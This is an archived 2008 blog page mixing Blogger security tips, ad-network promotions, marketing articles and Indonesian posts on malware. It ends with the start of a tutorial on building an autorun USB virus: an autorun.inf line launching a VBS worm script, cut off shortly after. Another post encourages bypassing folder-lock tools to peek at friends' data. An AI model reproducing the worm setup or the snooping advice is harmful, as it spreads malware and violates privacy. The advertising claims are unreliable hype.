Friday, February 15, 2008

Internet Security and Blogger Virus

The internet was abuzz with talk that the Blogger.com site had been hacked and compromised. Blog owners suddenly found fake spam posts in their Blogs containing links to virus downloads and data-mining sites. Some were faced with inexplicable web page load times, and others noticed odd code appearing in their templates. The natural reaction is to blame all of this on the people responsible for the viral attacks, even though that might not be the case. In this article, we share some tips we have learned on internet security and protection. These include the actions we can take to prevent or minimize the possibility of having Blogger blogs hacked or hijacked.


Is Blogger.com safe?

The BBC article, Bloggers battered by viral storm, reported that the latest incidents were the work of a group of hackers who had been mounting attacks since January. They used spam messages posted on bogus sites or sent through email to trick users into downloading malicious programs. The links were sometimes dressed up as YouTube links or digital greeting card links. The email subjects also contained informal internet jargon, which led recipients to think that the mail came from their friends.

In an official response yesterday, Eric of the Blogger team had confirmed that “Blogger was not compromised. Instead, the blog posts are from bloggers whose machines were compromised by a Trojan horse. These bloggers had their mail2blogger email addresses in their computers' address books ... so when the malicious software spammed every address in their address book with its content, a copy of that email was posted to their blog.”

In short, the Blogger platform is safe; if anything, Blog owners should ensure that their own computers are checked and protected against malware. Where does this leave us?

How the virus got into Blogs

Before we look at the preventive actions to take, we may want to know how these fake posts made their way into our Blogs. When you are logged into Blogger, you can see under Settings -> Email a “Mail-to-Blogger Address” feature. This enables you to post to your Blog by emailing the Post content to a mail-to-blogger address.

For those who have not used this feature, you can set up the address by entering a secret word or string into the highlighted part of the address (shown as xxxxxx below). This will be the address to which posts can be sent.

user.xxxxxx@blogger.com


If you have checked the “Publish” box, any message that is sent to this address will automatically get published in the Blog. If the “Publish” box is unchecked, the message will be saved and you have to log in to your Blogger account to publish it. The email subject heading will appear as the Title of the Blog Post.

Although this is a useful feature for people on the go, it is also one that can be exploited. All it takes is for anyone to send an email to this address, and whatever is in that email will appear in your Blog. It is therefore imperative that this address remain secret and confidential; anybody who is not authorized to post on your Blog should not know about it.

The moment a virus takes root in your computer, it can send malicious posts to the email addresses saved in your system's address book. If the above email address is one of them, you will see the post in your Blog. Since your Blog is legitimate, your readers and friends may read the post and click some of the links thinking that you would not put harmful material on your Blog. Once they do that, their computers may inadvertently be infected with the malware and they in turn have malicious links appear in their own blogs, and the cycle continues.

Preventive Steps to ensure Blog Security

1. Scan Computer and Protect against Threats

This sounds obvious, and yet there are many who do not see the need to protect their systems against viral threats. Some may find the scanning time long (it stretches to an hour for a full scan) or do not have a habit of scanning their systems. Others may find it costly to pay for an anti-virus software license. Always consider the alternative – the risk of losing all your data or having to reformat your hard drive – and you would probably agree that a little effort goes a long way to ensure peace of mind.

If you don't have updated antivirus software installed on your computer, make it a point to scan your computer using one of the free online virus scanners, such as:

a. Trend Micro Housecall
b. BitDefender Online Virus Scanner
c. Kaspersky Online Scanner
d. F-Secure Online Virus Scanner
e. Symantec Security Check

If you Google “online scanners”, you may see many sites which claim to provide free online virus scans. While many are authentic, there could well be a few which are not. Check them out if you'd like and stick to the tried-and-tested sites for future scans.

You can also download and install the free Google Pack and include Norton Security Scan, which eliminates viruses, and Spyware Doctor, which removes spyware, adware, trojans and keyloggers.

Another free program that we highly recommend is AVG Anti-Virus. Go for the Free Edition. For complete protection, also install the ZoneAlarm firewall if you are not using MS Windows Defender. These programs update their definitions regularly, and reviews of them have been very positive.

2. Configure Mail-to-Blogger Address

If you see a need to post to your blog via email, or think that others know your mail-to-blogger address, go back to Settings -> Email and pick or change the address to something that nobody can easily guess. Since the intent of this function is to have posts published without having to log in to Blogger, ticking the “Publish” option makes sense. After saving the Settings, go back to your email software, e.g., Outlook Express or Eudora, and remove that mail-to-blogger address from the address book. If the address is not recorded anywhere, then even if the virus sends mail to every address in the address book, nothing will be sent to your Blog.

3. Create different email and login addresses

Out of convenience, many people stick to one name for all their logins, emails and signatures. For example, they may have these:

blog name: myname.blogspot.com
login name: myname@gmail.com
email address given to readers: myname@gmail.com
user: myname


If people are bent on hacking your Blog, it is easy for them to figure out your login name and use programs to crack your password. When you create your next blog, consider assigning different names or not using your actual name:

blog name: blogname.blogspot.com
login name: notmyname@gmail.com
email address given to readers: anothername@gmail.com
user: screenname


4. Set browser security

In Internet Explorer -> Tools -> Internet Options, set the Security level for Internet zone to Medium-High or High. Also, in the later versions, you can turn on the Automatic Website Checking feature in the Phishing Filter settings.

If you are using Firefox, go to Tools -> Add-ons and click the “Get Extensions” link. Look for a popular extension called “NoScript”. It blocks JavaScript and other executable content, allowing only the sources you trust. It makes surfing the net a lot safer and lessens the chance of unintentionally running malicious scripts.

5. Use third party scripts with care

JavaScript makes our websites dynamic and vibrant, but malicious scripts can cause a great deal of harm. In our eagerness to place nice-looking widgets and interactivity into our sites, we sometimes overlook the fact that third-party service providers are not always trustworthy. Some domains last only a few days, just long enough for the hijacker to place downloadable widget scripts on the sites and then back out of the domain purchase after the cooling-off period. Blogs can also carry harmful scripts, some of them blindly copied from other sites and others intentionally created to trick readers.

For instance, you may come across an application that you like and are given code to place into your template. This code typically contains a link to a file with a .js extension. When your Blog page loads, this script is retrieved from the site where the file is hosted and runs in the background. Some prudent Blog owners do take the trouble to read through the script and satisfy themselves that there is nothing wrong with it. However, because the file is hosted on that provider's server, if they should decide to change it later and throw in something extra, you would have unknowingly introduced that into your Blog.

For the same reason, we have cautioned readers against downloading ready-made and customized templates from unknown or untested sources. Since not all of us are technical experts, we may not notice an undesirable script hidden somewhere in the template. Hence, for our guides such as the three columns template guides, we prefer to show you how to DIY and customize your own template. In this way, you know what goes into it and can easily reverse the change in future.
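One way to keep that risk visible, as an added example that is not part of the original article: list the externally hosted script includes in your template and compare each one with the hash of the copy you actually reviewed, so a later change by the provider shows up instead of slipping in silently. The template snippet, the hostnames and the script bodies are constructed for the demo.

```python
"""Inventory third-party <script src=...> includes in a blog template and
check each one against the hash of the copy you reviewed.

Added example, not code from the original article. The template snippet,
hostnames and script bodies below are constructed for the demo."""
from __future__ import annotations

import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, including the
    self-closing <script src='...'/> form that Blogger templates use."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def external_scripts(template_html: str, own_hosts: set[str]) -> list[str]:
    """Return the script URLs served from hosts you do not control."""
    collector = ScriptSrcCollector()
    collector.feed(template_html)
    found: list[str] = []
    for src in collector.sources:
        host = urlparse(src).netloc.lower()
        # A relative path has no host: it is served with the page itself.
        if host and host not in own_hosts and src not in found:
            found.append(src)
    return found


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pins(fetched: dict[str, bytes], pins: dict[str, str]) -> dict[str, str]:
    """Compare freshly fetched script bodies with the pinned hashes.

    'ok'       the body still matches the copy you reviewed
    'CHANGED'  the provider altered the file since you reviewed it
    'unpinned' you never reviewed and pinned this include at all"""
    status: dict[str, str] = {}
    for url, body in fetched.items():
        pin = pins.get(url)
        if pin is None:
            status[url] = "unpinned"
        elif sha256_hex(body) == pin:
            status[url] = "ok"
        else:
            status[url] = "CHANGED"
    return status


# --- constructed demo data (hostnames and bodies are made up) ---------------
TEMPLATE = """
<html><head>
<script src='/static/own.js' type='text/javascript'/>
<script src='http://widgets.example.net/badge.js' type='text/javascript'/>
<script type='text/javascript' src='//counter.example.org/hits.js'></script>
<script src='http://widgets.example.net/badge.js'/>
</head><body/></html>
"""
OWN_HOSTS = {"myblog.blogspot.com"}

# The copy you read through and pinned when you first added the widget.
BADGE_REVIEWED = b"document.write('<img src=/badge.png>');"
PINS = {"http://widgets.example.net/badge.js": sha256_hex(BADGE_REVIEWED)}

# What the provider serves today: the reviewed file with extra code appended.
FETCHED_TODAY = {
    "http://widgets.example.net/badge.js":
        BADGE_REVIEWED + b"\n// new code pushed by the provider",
    "//counter.example.org/hits.js": b"/* never reviewed */",
}


def demo() -> dict[str, str]:
    includes = external_scripts(TEMPLATE, OWN_HOSTS)
    return verify_pins({u: FETCHED_TODAY[u] for u in includes}, PINS)


if __name__ == "__main__":
    for url, state in demo().items():
        print(f"{state:9s} {url}")
```

On a live blog you would replace FETCHED_TODAY with the bytes you download from each URL and keep PINS in a file next to your template backup.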

6. Watch what we say or write

We thought we should add this. Many hackers do it either for the challenge or out of spite. Just as wearing skimpy clothes invites unnecessary attention and leaving our door open invites thieves, words and actions can give hackers an excuse to compromise your site. Observe basic courtesy and net etiquette. Be modest about your site. Every site can be the target of hijacks, including ours; no site is invulnerable.

What to do if Blog is hacked?

Despite all the security and preventive steps, if the day should come when the Blog contents disappear, the first thing to do is to scan the computer for viruses and malware. Do not log in to your email or other accounts, since this might open up more doors for the virus. Once the system has been completely scanned and rendered safe, you may log in to your Dashboard and view the Settings. Take note of any information that has been altered.

It is also possible that you are unable to log in because the password has been changed, or that the Blog and Blog Posts have been deleted. Write to the Blogger Support Team using another email account. Give them as much detail as possible and allow them time to investigate the cause. Since Google's servers would have backed up our data, it should be possible for them to reinstate your Blog upon proof of ownership.

Where the contents cannot be entirely retrieved, you may have to re-create the Blog. In moments like this, you would appreciate the importance of keeping backups of the template source codes and saving copies of the articles you have written.

Further reading:

As mentioned, if the Blog page load takes longer than usual, it is not necessarily caused by a virus. Blogger.com could be experiencing downtime, or the external sites from which information is retrieved may be causing the delay. This usually happens when we put a number of third-party applications and widgets into our site, such as advertising services, gadgets and scripts. Our article on Faster Web Page Load Time explains how you can check the page load time and improve the speed.

© Tips for New Bloggers


Tuesday, February 5, 2008

Apple Circle Template

Template Name: Apple Circle
Preview: See Demo
Author: Luke
Date Created: September 25th 2006
Description:
Amazingly new skin! Nearly an exact imitation of the Apple Macintosh! It even has the top header, but unfortunately, it does not minimize! The navigation is amazingly done; the copyright mixes in with the navigation. Two boxes, Graphite and Aqua colored, for fast news and other things. The news is short, but can be optimized to add an iFrame in it! You can't say no to this skin! Use Rights Only!

Use Rights:
You may use the skin for your own use, but not redistribute or edit the skin. You may edit the navigation images, but not the entire skin itself. Leave copyrights intact.



Monday, February 4, 2008

Creamy Orange Template

Template Name: Creamy Orange
Preview: See Demo
Author: Luke
Date Created: August 19th 2006
Description:
This skin should be in the WOW section! Amazingly effective skin, perfect for anything! Originally for a TV show company, but later released for the public... this website is incredible. The nice orange and cream color gives it a unique look; it must be downloaded and used! Use Rights Only!

Use Rights:
You may use the skin for your own use, but not redistribute or edit the skin. You may edit the navigation images, but not the entire skin itself. Leave copyrights intact.



NetAudioAds [ Pay Per Play ]

Get paid on 100% of your website traffic, no clicks necessary! How is this possible? CLICK HERE

A revolution in advertising is taking place, millions of dollars are being earned, will you miss the boat? CLICK HERE
Get a guaranteed 100% conversion rate on your website visitors CLICK HERE
Pay-Per-Play is due to officially launch on February 1st, 2008. Now is the time to tell everyone you know about the free PPP opportunity.


We need as many websites as possible to register to run PPP ads before February 1st so that we ensure top dollar from our advertisers.
Make sure to read through the PPP tutorials, because there is valuable information there to help you kick off your PPP business in a professional manner.

We now have over 12,000 registered members who have brought on over 8 million new websites in less than 2 months.
PPP is a rare opportunity to lock in major residual flows of income for the web's newest and fastest growing advertising vehicle ... Pay-Per-Play.




Exciting news and Updates from Voice2Page NetAudioAds
---------------------------------------------------------------
We are launching the new statistics system tonight or early tomorrow morning!
Changes include:
We added 'Yesterday' totals to the existing information
'Today, Yesterday, This Month, Last Month, This Year, Last Year and Total'

We know that it has taken a long time to get the statistics pages online.
We have had to filter out many large, malicious attempts to game the system, and
we also needed to work with the BPA team for proper reporting of such a large
number of ad play records.
---------------------------------------------------------------
Many, many people have asked for keywords to filter ads to their sites.
We have added two new items to the code fragment that you embed in your HTML:
you will see the new variables naa_keywords and naa_noads.
You may add these to your code to specify which keywords you LIKE
as well as which keywords you would prefer NOT to advertise on your pages.

We require that naa_sitename be no longer than 32 chars and the new fields
must not exceed 64 characters each.
---------------------------------------------------------------
ADVERTISING starts this weekend!!! We are moving into launch mode!!!!!!!

We will start slow, with some smaller, tolerant advertisers while we
ensure that all systems are go and working properly.
---------------------------------------------------------------
Watch this news space and the Blogs and Forums at Pay-Per-Play for more news



Regards,

MiztaPEE


ContentLink™

In Text Advertising Solution for Publishers

What are ContentLinks?
ContentLinks are contextually relevant keywords discovered in real time on a publisher’s web page that are automatically turned into a link to the most relevant and highest paying text ad from one of Kontera’s thousands of advertisers.



What ContentLink can do for you?
Kontera’s ContentLink In-Text Advertising solution lets you monetize your content in real-time, enabling an incremental increase in ad revenue by providing a new source of untapped ad inventory that does not compete with the other ad programs running on the site. ContentLink™ also creates a valuable user experience by serving relevant and informational ads that match the user’s interest and frame of mind.

The ContentLink advantage:
At the core of Kontera’s patent-pending technology is a set of proprietary algorithms that enable publishers to maximize their revenue and earn higher click-through rates. Statistical text analysis and clustering methodologies are used, combined with semantic analysis procedures that utilize a proprietary taxonomy of subjects, keywords, and the unique relationships between them. Kontera’s platform, optimized and proven on thousands of web pages over the last seven years, analyzes each web page in real time. Keywords and topics are extracted and ranked, and then instantly matched to the advertiser’s most relevant text ad. The greater relevancy between the content, keyword and text ad made possible by Kontera’s proven technology increases the publisher’s revenue.

ContentLink provides :
Increased Incremental Revenue – ContentLink maximizes your advertising revenue by running In-Text Advertising alongside your existing banner, text, or other ad units, thereby providing you with a new revenue stream from the content within your site.

Untapped Sources of Ad Inventory – Because In-Text Advertising creates a new type of advertising real estate from within the content of your own website, the revenue opportunities are nearly limitless.

High Click-Through Rates (CTR) – Kontera’s proprietary technology serves the most relevant In-Text keyword advertising, and therefore generates higher CTRs than most other contextual advertising vehicles, translating into more revenue for you.

Instant Implementation – Kontera’s user-friendly solution will have you up-and-running in minutes. All you need to do is place Kontera’s JavaScript tag on your site pages.

Positive User Experiences – Not only is the ContentLink superior in its contextual relevance, the ad itself appears only when the user mouses over the ContentLink and does not automatically intrude on the user’s experience. The user chooses whether to interact with the ContentLink or to ignore it altogether. Further, it contains only either a relevant ad or an internal link to another relevant page within your site or network of sites. ContentLink provides users with relevant information when they are most interested and receptive to receive it.

Editorial Integrity – Since ContentLinks are added dynamically, in real-time, only after the text on the site has been loaded, you retain complete control over your web content. No text is compromised, and there is no interruption of the speed of page-loading. The ultimate integrity of your editorial content and your users’ experience is therefore maintained.

Content Monetization – Whether your content includes articles, user-generated postings, product reviews, blogs, or social networking sites, Kontera’s dynamic contextual analysis lets you serve ContentLinks as soon as new and relevant content is posted.

Publisher Control &amp; Customization – You control the number of ContentLinks that appear on your content, the color of the link, its placement, its look and feel, the way the window opens once a prospect clicks, as well as competitor filtering, keyword filtering, etc.

24/7 Customer Service – Your dedicated Kontera account manager will provide real-time support 24/7 to answer your questions and make sure that your revenue is optimized. Kontera’s professional customer service teams work with you to ensure that your ContentLink In-Text advertising is a commercial and editorial success.

Online Reporting – Kontera’s technology platform provides an online interface for watching your money. See how much revenue you are generating on a daily basis!

New Publisher Value-Added Functionality – Kontera offers new features to increase user time spent, stickiness and in turn, your revenue:
Intra-Site Links – Increase website stickiness by offering intra-site links to contextually relevant content on your website
3rd Party Information Links – Add user value by offering links to external information including dictionaries, encyclopedias and more

ContentLink Private Label Publisher Solutions:
Looking to increase your advertising revenue? Kontera enables leading publishers to take control of their advertising operations and increase their ad revenue with our comprehensive advertising management solution. Click Here to read more about ContentLink Private Label Publishers Solutions






Increase Your Website Traffic

I don't know about you, but when I first entered the world of internet marketing I thought I could just submit my newly finished website to a few search engines, then sit back as the visitors flocked to my site.

I imagined that people would arrive on my website, as if by magic, purchase goods, and perhaps come back again for more.
A week or so later I came down to earth with a big bump.
I realised that it would take a bit of time and effort to see the results that I was dreaming about!
Since my reality check, I have learned all about the weird and wonderful ways of internet marketing.



In this article I will tell you about my top 5 free ways of increasing website traffic.
All these methods are completely free and if you spend some time on them you will find that they work consistently.

(1) Writing Articles

Writing an article on a subject related to your website and getting that article published has two major benefits:
- People who are interested in your article will read it and often click on the URL in your resource box to find out more. This gets you another free targeted visitor. Targeted, because that reader wants to find out more on the subject of your article, which is hopefully related to the subject of your website.

- Every publisher of your article must also publish your "resource box". Adding a resource box with your URL to all of your articles will increase the number of links leading back to your website, which in turn helps to improve your search engine position.
For a list of directories to submit your article to, see Article Submission Directories.

(2) Forum Networking
There are many discussion forums on the internet, on every topic you could possibly imagine.

Most discussion boards allow posters to attach a "Signature" with their post containing additional information about themselves, such as their name, URL and sometimes even an advertisement.

By visiting a few forums regularly and participating in the discussions, asking and answering questions, you can build up trust with other forum members, whilst at the same time getting free exposure for your website.
Just try to make a useful contribution to the forum - be sure to read the forum rules and don't spam!

(3) Reciprocal Linking for Website Traffic

Reciprocal linking has two main benefits for you.
Firstly, the more links that you exchange, the more chance there is that someone will follow a link from another site and land on your website.

Secondly, your website will be perceived as more important by search engines.
The more links you have from other sites, the greater your chance of getting ranked more highly by all the search engines.

Here are some Dos and Don'ts to help you get more out of your link exchanges.

- Do link with sites that will be of interest to your visitors.
- Don't link with pages that have unorganised link directories with hundreds of links on each page. This won't benefit you with increased traffic or search engine rankings.
- Do link with sites that have a clearly labelled "Link Directory" from their main page. You aren't likely to get much traffic from a hidden or hard to find link directory.
- Don't use link farms or FFA pages. You are unlikely to get extra traffic using these methods and the search engines may penalise you.
- Do use link directories to help you find link partners. You can find some Link Exchange Resources here.
- Do stay organised. Use link exchange software, or a spreadsheet to keep track of the link exchanges you have requested and the contact details of the webmasters.

(4) Email Signatures
This is a very simple, but often forgotten way of increasing your website visitors.
Most of us are sending lots of emails a day, but many of us just sign them with just our name, or perhaps nothing at all.
Instead, why not end your emails with a short signature containing your name, a bit about your website along with the URL?

Keep the signature short (4 lines), to the point and avoid hype or SHOUTING.
You may be surprised at the extra visitors you receive through doing this. It's amazing how curiosity will lead the recipients of your email to click on your link!


(5) Using Traffic Exchanges
Finally, this is one easy way to guarantee instant hits to your website. You can build up credits for free by surfing or building up a downline to surf for you.

The downside of this method is that the visitors you receive from traffic exchanges are not as targeted as the visitors that you will receive via the other methods that I have described.
The reason for this is that people surf traffic exchanges for one reason - to earn as many credits as possible in as short a space of time as possible!
This gives you a challenge - how do you attract the attention of someone who is looking at your web page for 20 seconds or less?

Here are two tips -
- Know your market - spend some time surfing on the exchange that you are advertising on and pay attention to the types of web pages being advertised. Make sure that the pages you advertise are going to interest your target market.
- Use a short, simple attention grabbing page that can be read in a few seconds - there is no point advertising a huge page of text that takes 5 minutes to read. The chances are, your visitor will get bored and click on the "next" button without giving your page a fair chance.

Regularly invest some time in each of these 5 traffic generating methods and you will see your web statistics moving in the upwards direction before you know it.


Regards,

MiztaPEE


Sunday, February 3, 2008

The Key to Successful Marketing


If your business has limited marketing resources in terms of people, expertise and materials then you might want to consider outsourcing your marketing functions to an independent marketing professional or a marketing and promotions agency. Small businesses, downsized companies, and expanding corporations all have different reasons to outsource.

Marketing can be an expensive activity, and maintaining in-house resources can make this a difficult program to commit to. But marketing is a very important part of business success, so allowing someone else to focus on marketing gives companies a chance to focus on their core business and on the areas that will enable them to surpass their competition.



Outsourcing marketing resources comes with a price, but this cost is usually lower than it would be if the company had employed staff and undertaken the activities in house. By eliminating the need to hire full-time employees, using an agency for marketing resources saves companies thousands of dollars on wages, taxes and benefits. You also gain expertise in an agency that you might not find in individual employees. In addition to their own staff, agencies have other resources to help you, such as their own outside contacts, suppliers, designers, copywriters and printers, saving you time as well as money.

When you hire an outside agency, you are hiring experts in marketing. These are professional people who can focus on all your marketing needs and not be hindered by your internal politics, relations between employees, or lack of knowledge among staff about marketing strategies and how they integrate with business strategies. Marketing professionals, whether independent or working through a marketing agency, will often have more experience in the particular aspects of marketing than your staff, and undoubtedly more than you could pay for in an employee. Also, since they work with other clients, they have seen what works and what doesn't in other companies' campaigns. This knowledge translates into more efficient and effective marketing for you, as you have the benefit of their hindsight.

As with outsourcing any business function, allowing an outside agency to do your marketing or advertising brings a certain kind of objectivity with it. Sometimes you just need a fresh perspective to overcome difficulties and to achieve specific goals. An objective marketing professional will help you see things you might otherwise miss and will be more open to offering a range of fresh ideas as opposed to a bunch of tired ideas that you might have been toying with for years but have yet to implement.


About the author:
rudiz vendita is the owner of FU Marketing, which is a premier resource for marketing information. For more information, go to Successful Marketing Webs.




By MiztaPEE


ALMAN, the Virus That Loves to Eat EXE Files

The virus self-defence technique of creating a parent file with an exe, com or scr extension on the system drive has begun to lose popularity; in other words, it is out of date. The reason is that this trick, used by so many local viruses, has become so commonplace that it is easy to recognise and to tame. Simply by using Windows Task Manager, or other tools such as ProcessExplorer, System Task Manager, ProcLister, IceSword and the like, we can easily identify the parent file created by the virus and then kill its process or even delete the file altogether. A string of local viruses such as Brontok, Kangen, Decoil, Mr. CoolFace, Wayang, Blue Fantasy and Moon Light, it turns out, still rely on that technique.


A step further on, the kspoold family appeared with a smarter technique: it creates an avmeter32.dll or avwav32.dll file in the system directory that injects itself into explorer.exe. Even so, the presence of kspoold on our computer is quickly noticed, not only because it changes doc and xls files into exe files on the flash disk (its new variant reportedly changes every doc file on the computer into bmp), but also because this virus still writes a file called kspoold.exe to the system directory, which can be seen through Task Manager.

About 1 month ago I found a new virus (it may also be an old virus that I had only just come across), and I do not know whether it was made in Indonesia or not, but what is clear is that this virus comes with an even better disguise technique.

The virus, which AVG and Kaspersky identify by the name ALMAN, is fairly unique because, besides its ability to infect exe files, the parent file it creates is quite hard to trace: it is not an executable file but a file with a dll extension, so its activity will not show up in the Task Manager window.

Aksi sang virus
Jika menginfeksi system, virus alman akan membuat 2 file di direktori system yakni wmdrtc32.dll dan wmdrtc32.dl_. File wmdrtc32.dll dibuat dengan ukuran sekitar 40 KB, diset beratribut normal. File ini ditugaskan untuk menginjeksi file explorer.exe miliknya windows setiap kali dijalankan. Ini saya ketahui setelah mengintipnya dengan tools gratisan a-squared HijackFree yang sebenarnya juga sedang terinfeksi. Ternyata file wmdrtc32.dll terdaftar sebagai salah satu module yang sedang digunakan oleh file explorer.exe. Demikian halnya file-file executable lain yang telah terinfeksi ketika dieksekusi akan menggunakan file tersebut sebagai salah satu modulnya. Ini mirip dengan aksi yang dilakukan oleh file avmeter32.dll atau avwav32.dll milik virus kspoold. Selanjutnya file wmdrtc32.dl_ berukuran sekitar 26,5 KB dan diset beratribut system dan hidden. Disinilah terlihat kelihaian teknik social engineeringnya karena jika dilihat sepintas lalu, file wmdrtc32.dl_ seolah-olah merupakan file milik windows yang telah direname oleh virus dan digantikan dengan file lain dengan ukuran berbeda. Dengan demikian, kita dapat terkecoh hanya menghapus file wmdrtc32.dll (40 KB) kemudian mengembalikan ekstensi dll pada file wmdrtc32.dl_ (26,5 KB) karena mengira itu filenya windows.
Recognizing infected files

It is actually quite hard to recognize an exe file infected by this virus just by looking at it. This is because most of the files it infects keep running normally, except for a few such as PCMAV-CLN.exe and PCMAV-RTP (both antivirus programs made by PC Media) that I have come across.

Still, if we can remember the sizes of our executable files, an infected file can be recognized immediately from the change in its size. Each exe file can be infected up to twice by this virus, with the file growing by 28 KB and by 40 KB respectively. That is, if a file has already been infected and grown by 28 KB, the next infection adds 40 KB, and vice versa. So every infected file can grow by up to 68 KB in total.
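The size check above only works if you recorded the sizes beforehand, and a same-size modification would slip past it. As an added example (this script is not from the original post or from any antivirus vendor), here is a small baseline-and-compare tool in Python: it records size and SHA-256 for each executable, reports every file whose hash changed, and labels a growth that matches the 28 KB / 40 KB / 68 KB figures quoted above. Treating 1 KB as 1024 bytes with a one-kilobyte tolerance, the directory paths and the sample bytes are this example's own assumptions.

```python
"""Baseline-and-compare check for executables (added example, not from the post).

Records size + SHA-256 for each executable, reports every file whose hash
changed, and labels a size growth matching the 28 KB / 40 KB / 68 KB
figures the post gives for Alman. A hash is kept as well, because a
same-size modification would slip past a size-only check.
"""
import hashlib
import json
import os

# Growth figures quoted in the post for Alman, in KB. Using 1 KB = 1024
# bytes with a 1 KB tolerance is this example's assumption.
ALMAN_GROWTH_KB = (28, 40, 68)
TOLERANCE_KB = 1
EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".com")


def fingerprint(data: bytes) -> dict:
    """Size and SHA-256 of one file's contents."""
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def build_baseline(files: dict) -> dict:
    """files maps path -> bytes; returns path -> fingerprint."""
    return {path: fingerprint(data) for path, data in files.items()}


def read_tree(root: str) -> dict:
    """Read every executable under root into memory (real-filesystem helper)."""
    found = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(EXECUTABLE_EXTS):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    found[full] = fh.read()
    return found


def compare(baseline: dict, current: dict) -> list:
    """Return (path, verdict, size_delta) for every difference between two baselines."""
    findings = []
    for path, old in baseline.items():
        new = current.get(path)
        if new is None:
            findings.append((path, "missing", -old["size"]))
            continue
        if new["sha256"] == old["sha256"]:
            continue  # unchanged
        delta = new["size"] - old["size"]
        verdict = "modified"
        if any(abs(delta / 1024 - g) <= TOLERANCE_KB for g in ALMAN_GROWTH_KB):
            verdict = "modified, growth matches Alman pattern"
        findings.append((path, verdict, delta))
    for path, new in current.items():
        if path not in baseline:
            findings.append((path, "new file", new["size"]))
    return findings


def save_baseline(baseline: dict, path: str) -> None:
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=1)


def load_baseline(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


if __name__ == "__main__":
    # Constructed demo: a clean file, then the same file grown by 28 KB.
    clean = {"C:/apps/tool.exe": b"MZ" + b"\x00" * 4096}
    grown = {"C:/apps/tool.exe": clean["C:/apps/tool.exe"] + b"\x90" * (28 * 1024)}
    for finding in compare(build_baseline(clean), build_baseline(grown)):
        print(finding)
    # Real use (assumed paths):
    #   save_baseline(build_baseline(read_tree(r"C:\apps")), "baseline.json")
    #   compare(load_baseline("baseline.json"), build_baseline(read_tree(r"C:\apps")))
```

The baseline must be taken while the machine is known to be clean, and it is only trustworthy if the file it is saved in cannot be rewritten by the same malware you are looking for, so keep it on read-only or removable media.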

Killing the virus process
Honestly, I know nothing about programming. So I have no killer move against this virus, because wmdrtc32.dll cannot simply be deleted. However, since the dll it creates also injects explorer.exe, as kspoold does, I was reminded of an article I once downloaded from vaksin.com. That article contains the source code of a simple remover, which can be written in Notepad, that kills the virus process and deletes the virus file at the same time. That source code can be modified to kill the process and delete wmdrtc32.dll and wmdrtc32.dl_ in the system directory. I am not including the source code here because the article would grow too large. Besides, I would rather not be labelled a plagiarist. So if you want it, download it yourself from vaksin.com!
Cleaning infected files

So what becomes of the infected exe files? As of now, PCMedia's latest release, PCMedia RC22, does not recognize the Alman virus at all, while Ansav recognizes it as Sality but cannot clean it: infected files are deleted. That is not much different from AVG Anti Virus, which just deletes whenever it meets this virus. Since I am not a programmer and know nothing at all about programming, I rely solely on Kaspersky (McAfee works too) with a fresh update, which now recognizes this virus well and can clean infected files, although not every file can be cleaned perfectly.
By eL!t!zT
Jasakom


Uncovering protected files

It is indeed impossible to see a virus or a bacterium with the naked eye. Perhaps that is why in the days of the Pharaohs the terms virus and bacterium were unknown. But with the invention of the microscope, those microscopic creatures that so often trouble humans could finally be seen, stripped bare and analysed in detail. In conclusion, what we can see depends very much on the equipment (instruments) we use.

Not unlike the real world, in the computer world that basic law still holds. With different tools (read: software) we see different files and folders. For example, when using Windows' built-in tool, Windows Explorer, to browse the hard disk, by default we cannot see files and folders that carry the hidden and system attributes, unless we change a setting in Folder Options or in the registry.



It is a very different story when we use another tool, for example Partition Magic 8. With the Partition Browser application from Partition Magic 8 we can see every file and folder with the hidden and system attributes (super hidden) without first changing any setting in Folder Options or the registry. There are now a great many applications on offer to protect our secret archives or programs on the computer so that they are not easily traced and opened by other hands. Some of these applications are freeware and others are licensed. Moreover, the protection method each piece of software offers also differs.

One freeware application the author tried is Folder Lockbox, which can be downloaded from its official site www.folderlockbox.com or from www.freewarefiles.com. Despite being freeware, this application is quite good because it leaves no trace in the popup menu and is also protected by a password.
When opening it, we must enter the password first. With this application a folder is hidden so that even if it is searched for with Windows' search facility or browsed with Partition Magic, it still will not be found. Even better, this application stays active into Safe Mode (but it is not active in Safe Mode with Command Prompt, and it can only protect a single folder). So, for the true beginner class not yet used to accessing Windows through Safe Mode with Command Prompt or DOS, the level of folder/file protection this application gives is fairly decent. Is that really so?

If you have ever installed an application called Paragon Rescue Kit 4, which bundles an application named Image Explorer, you will start to doubt the strength of Folder Lockbox's protection. With Image Explorer we can see and browse the contents of a folder that is being protected by Folder Lockbox, and can open and move each of its contents elsewhere, even when booted in plain normal mode. If you want to try it, you can find it at www.paragon.ag or on the CD of Komputer Aktif magazine issue 145.
The Image Explorer interface is very simple, with a few items on its popup menu, among them Export, which copies the contents of a given folder elsewhere, plus other fairly interesting features (I can't be bothered to list them one by one, tired of typing). Besides Folder Lockbox, other tools whose protection Image Explorer can strip, and which I managed to try (given my limited knowledge), are Hide File and Folder and Easy File and Folder Protector, which can be grabbed from www.softstack.com. Feel free to try the other protector applications yourself, which are scattered everywhere in ever greater numbers, for example Lock Folder, Folder Security and many more (the supply is almost unlimited).

Just for information, the Image Explorer executable is only about 960 KB, quite small and handy for starting the habit of peeking at and messing with friends' secret data. Once Paragon Rescue Kit 4 is installed, you can copy Image Explorer to another computer without installing it again. This is what the Image Explorer interface looks like:
[Image: Image Explorer interface]


Friday, February 1, 2008

Creating and Removing an Autorun Virus without an Antivirus

This article complements the previous one; the material used as the sample virus is the virus named k4l0n6. First of all, this write-up is for educational purposes only; if you are interested, read this article to the end. But if you don't like it, or have read about this topic before, better not continue reading.


The autorun virus is built as follows

1. First script

[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs

save that code under the file name and extension "autorun.inf" (without the quotes)

2. Second script
'Kalong-X2
'Variant of Kalong.VBS
